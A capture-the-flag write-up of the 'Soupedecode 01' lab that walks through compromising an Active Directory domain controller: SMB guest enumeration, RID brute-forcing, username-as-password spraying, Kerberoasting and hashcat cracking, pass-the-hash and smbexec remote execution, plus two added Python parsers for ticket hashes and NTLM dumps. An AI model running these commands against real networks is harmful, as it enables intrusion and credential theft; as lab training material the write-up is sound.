Soupedecode 01
Test your enumeration skills on this boot-to-root machine. - by josemlwdf
The following post by 0xb0b is licensed under CC BY 4.0
Recon
We start with an Nmap scan of all ports, which reveals multiple services typical of an Active Directory domain controller: DNS (53), Kerberos (88, 464), SMB (445), LDAP (389, 636), Global Catalog (3268, 3269), and MSRPC/NetBIOS (135, 139). We also see Remote Desktop Protocol (3389), Active Directory Web Services (9389), and a range of high-numbered ephemeral ports (49664–49793) commonly used for DCOM and RPC communication.
nmap -p- soupdecode01.thm -Pn
We perform a default script scan and version scan on the ports and can determine the domain name and FQDN, which we add to our /etc/hosts file:
nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,9389,49664,49666,49675,49711,49793 soupdecode01.thm -Pn
dc01.soupdecode.local, soupdecode.local
Access To SMB as Guest
Since we have SMB available, we start enumerating it with NetExec (formerly CrackMapExec). It is an enumeration tool used for assessing and interacting with SMB and other network services. We use the built-in guest account and an empty password for an initial enumeration.
Initial connectivity was verified with the guest account without a password.
nxc smb soupdecode.local -u guest -p ''
We are able to connect as guest. We then list the shares available to the guest account, which confirms that the IPC$ share is readable.
nxc smb soupdecode.local -u guest -p '' --shares
To further enumerate domain users, we perform a RID brute-force, since the IPC$ share is readable.
nxc smb soupdecode.local -u guest -p '' --rid
We craft a user list with the following command, keeping only the user accounts (computer accounts ending in $ are filtered out). With this user list we could try Kerberoasting or brute-forcing the accounts.
grep 'SOUPEDECODE\\' rid_brute.txt | cut -d':' -f2- | sed -E 's/.*SOUPEDECODE\\(.*) \(SidType.*/\1/' | grep -v '\$' > usernames.txt
Access To SMB as ybob317
First, we attempt to authenticate to SMB on the soupdecode.local domain using nxc smb with the list of usernames as both the username and the password list. With --no-brute, nxc only tries each username with the password at the same position in the list (so, with the same file for both, each account is tested with its own username as password) instead of every combination, and --continue-on-success keeps going after a valid pair is found. We spot valid credentials for ybob317.
nxc smb soupdecode.local -u usernames.txt -p usernames.txt --no-brute --continue-on-success
We try to enumerate the shares and see we are able to read the Users directory.
nxc smb soupdecode.local -u 'ybob317' -p 'REDACTED' --shares
We connect to the share...
smbclient //soupdecode.local/Users -U ybob317
... and are able to spot the users.txt in \ybob317\Desktop.

Kerberoasting - Access as file_svc
With valid domain credentials we can try Kerberoasting: we request service tickets for every account that has an SPN set and are able to retrieve some hashes.
impacket-GetUserSPNs soupedecode.local/ybob317:REDACTED -dc-ip 10.10.205.165 -request -output hashes.txt
Of these, the hash for file_svc is crackable.
hashcat -a 0 -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt --show
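Which hashcat mode a ticket needs, and how exposed the service account is, depends on the encryption type (etype) encoded in each $krb5tgs$ line that GetUserSPNs writes to hashes.txt. The following Python parser is an added example written for this post; it is not part of the original walkthrough or of impacket. The sample lines, including the sql_svc account, its SPN and the hex checksum/ciphertext fields, are constructed placeholders and not data from the machine.

```python
import re
from typing import Optional

# hashcat modes for Kerberos 5 TGS-REP tickets, keyed by etype
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}

# etype 23 (RC4-HMAC): $krb5tgs$23$*user$REALM$spn*$checksum$ciphertext
_RC4_RE = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$"
)
# etype 17/18 (AES): $krb5tgs$18$user$REALM$*spn*$checksum$ciphertext
_AES_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>17|18)\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$\*(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$"
)

# Constructed sample file: the second line (sql_svc, its SPN) is invented for the
# example, and the hex fields are placeholders, so neither line will ever crack.
SAMPLE_HASHES = """\
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$soupedecode.local/file_svc*$00112233445566778899aabbccddeeff$0f1e2d3c4b5a69788796a5b4c3d2e1f0
$krb5tgs$18$sql_svc$SOUPEDECODE.LOCAL$*MSSQLSvc/dc01.soupedecode.local:1433*$00112233445566778899aabb$0f1e2d3c4b5a69788796a5b4c3d2e1f0
this line is not a ticket
"""


def parse_krb5tgs(line: str) -> Optional[dict]:
    """Split one $krb5tgs$ line into account, realm, SPN, etype and hashcat mode.

    Returns None for lines that are not in a recognised TGS-REP format.
    """
    line = line.strip()
    etype = 23
    m = _RC4_RE.match(line)
    if m is None:
        m = _AES_RE.match(line)
        if m is None:
            return None
        etype = int(m.group("etype"))
    return {
        "user": m.group("user"),
        "realm": m.group("realm"),
        "spn": m.group("spn"),
        "etype": etype,
        "hashcat_mode": HASHCAT_MODES[etype],
        "rc4": etype == 23,
    }


def parse_hash_file(text: str) -> list:
    """Parse every recognisable line of a hashes.txt-style file."""
    return [p for p in (parse_krb5tgs(ln) for ln in text.splitlines()) if p]


def rc4_service_accounts(text: str) -> list:
    """Accounts whose tickets came back RC4-encrypted (etype 23): the weak, fast-to-crack ones."""
    return [p["user"] for p in parse_hash_file(text) if p["rc4"]]


if __name__ == "__main__":
    for ticket in parse_hash_file(SAMPLE_HASHES):
        print(f"{ticket['user']:<10} etype={ticket['etype']} hashcat -m {ticket['hashcat_mode']} spn={ticket['spn']}")
    print("RC4-exposed service accounts:", rc4_service_accounts(SAMPLE_HASHES))
```

Only etype 23 (RC4-HMAC) tickets are mode 13100; AES tickets (etype 17 and 18, modes 19600 and 19700) are far slower to crack, which is why the usual hardening is to restrict service accounts to AES-only and give them long or managed (gMSA) passwords.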
We use the credentials of file_svc to enumerate the shares, and see that we are now able to read the backup share.
nxc smb soupdecode.local -u 'file_svc' -p 'REDACTED' --shares
Pass-the-Hash - Access as FileServer$
Next, we retrieve the content of the backup share.
smbclient //soupdecode.local/backup -U file_svc
This share contains some NTLM hashes.

First, we retrieve the usernames (the first field) from the list.
cut -d ':' -f 1 backup_extract.txt > extracted_users.txt
To extract just the NTLM hashes (the fourth field) from backup_extract.txt using cut, we use the following command:
cut -d: -f4 backup_extract.txt > ntlm-hashes.txt
We pass the hashes and find a valid hash for FileServer$.
nxc smb soupdecode.local -u extracted_users.txt -H ntlm-hashes.txt --no-brute
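The two cut commands above assume every line of backup_extract.txt is well-formed. The Python below is an added example written for this post (not part of the original walkthrough) that parses the same user:RID:LM:NT::: layout into records, reports malformed lines instead of silently misaligning the user and hash lists, and adds two checks a defender reviewing such a dump would want: accounts whose NT hash is the well-known empty-password hash, and accounts that share a hash (and therefore a password). The sample dump is constructed: the RIDs, the accounts user1 and user2 and all NT hashes except the empty-password constant are placeholders, not values from the machine.

```python
import re

# NT hash of the empty string: an account with this hash has no password set.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user:RID:LM:NT::: as written by secretsdump-style tools
_LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample: the LM field is the well-known empty-LM constant, the NT
# hashes (except Guest's) are placeholders, and user1/user2 are invented accounts.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000001:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
FileServer$:1105:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000002:::
user1:1201:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000003:::
user2:1202:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000003:::
not a dump line
"""


def parse_dump(text: str):
    """Parse dump lines into records; returns (records, malformed) so nothing is dropped silently."""
    records, malformed = [], []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = _LINE_RE.match(line)
        if m is None:
            malformed.append((n, line))
            continue
        nt = m.group("nt").lower()
        records.append({
            "user": m.group("user"),
            "rid": int(m.group("rid")),
            "nt": nt,
            "machine_account": m.group("user").endswith("$"),  # computer accounts end in $
            "empty_password": nt == EMPTY_NT_HASH,
        })
    return records, malformed


def split_users_and_hashes(text: str):
    """Same split as the two cut commands: users and NT hashes, kept in matching order."""
    records, _ = parse_dump(text)
    return [r["user"] for r in records], [r["nt"] for r in records]


def shared_hashes(records: list) -> dict:
    """Map each NT hash used by more than one account to those accounts (identical hash = identical password)."""
    groups = {}
    for r in records:
        groups.setdefault(r["nt"], []).append(r["user"])
    return {h: users for h, users in groups.items() if len(users) > 1}


if __name__ == "__main__":
    records, malformed = parse_dump(SAMPLE_DUMP)
    print("machine accounts:", [r["user"] for r in records if r["machine_account"]])
    print("empty passwords: ", [r["user"] for r in records if r["empty_password"]])
    print("shared hashes:   ", shared_hashes(records))
    print("malformed lines: ", malformed)
```

When the user and hash lists are produced separately with cut, a single malformed line shifts every hash after it onto the wrong username; building both from one parsed record list keeps them aligned.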
Next, we use smbexec with the FileServer$ hash to execute remote commands over SMB. We have sufficient access rights to read C:\Users\Administrator\Desktop, where we find the root flag root.txt.
impacket-smbexec 'FileServer$'@soupdecode.local -hashes ':REDACTED'